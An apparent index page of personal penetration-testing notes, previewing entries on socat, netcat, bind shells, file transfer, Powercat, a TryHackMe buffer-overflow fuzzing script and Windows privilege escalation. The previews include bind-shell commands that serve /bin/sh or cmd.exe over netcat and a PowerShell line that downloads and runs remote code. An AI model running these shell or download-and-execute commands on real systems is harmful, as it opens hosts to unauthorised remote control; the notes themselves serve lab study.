Docs

Socat

Client Mode socat - TCP4:<server ip>:<port> Server Mode Ports below 1024 require sudo/root permissions socat TCP4-LISTEN:<port> STDOUT

Netcat

Client Mode nc -nv <ip> -n: Do not resolve DNS entries -v: Add verbosity Server Mode nc -nvlp 4444 -n: Do not resolve DNS entries -v: Add verbosity -l: Listen Mode -p: Spe...

Bind Shells

Netcat Server - Linux nc -nvlp 4444 -e /bin/sh Server - Windows nc -nlvp 4444 -e cmd.exe Client nc -nv <server ip> 4444 Powercat Server - Windows Standard powercat -l -p 443 -e c...

File Transfer

netcat Note: There will be no progress indicator, and the command will not terminate when complete. Estimate how long the transfer will take, terminate the command, and verify the file. Recei...

Powershell

Execution Policy All Users Set-ExecutionPolicy Unrestricted Current User (Non-Admin) Set-ExecutionPolicy -Scope CurrentUser Unrestricted

Powercat

Not installed on Kali by default sudo apt install powercat /usr/share/windows-resources/powercat Delivery iex (New-Object System.Net.Webclient).DownloadString('https://raw.githubuserco...

TryHackMe - Buffer Overflow Prep

Fuzz for Overflow Vulnerability !mona config -set workingfolder c:\mona\%p #!/usr/bin/env python3 import socket, time, sys ip = "<VM IP Here>" port = 1337 timeout = 5 prefix = "OVERFLOW1...

Rooted Boxes

Box Source Date Internal Try Hack Me 2021-05-11 Relevant Try Hack Me 2021-05-09 Overpass 2 ...

Networking

Common Ports Port Service 21/tcp FTP 22/tcp SSH 23/tcp Telnet 25/tcp SMTP ...

Windows Privilege Escalation

Tools WinPEAS User whoami User Privileges whoami /priv Important Privileges SeImpersonatePrivilege User can impersonate the token of any access token (find system/admin ac...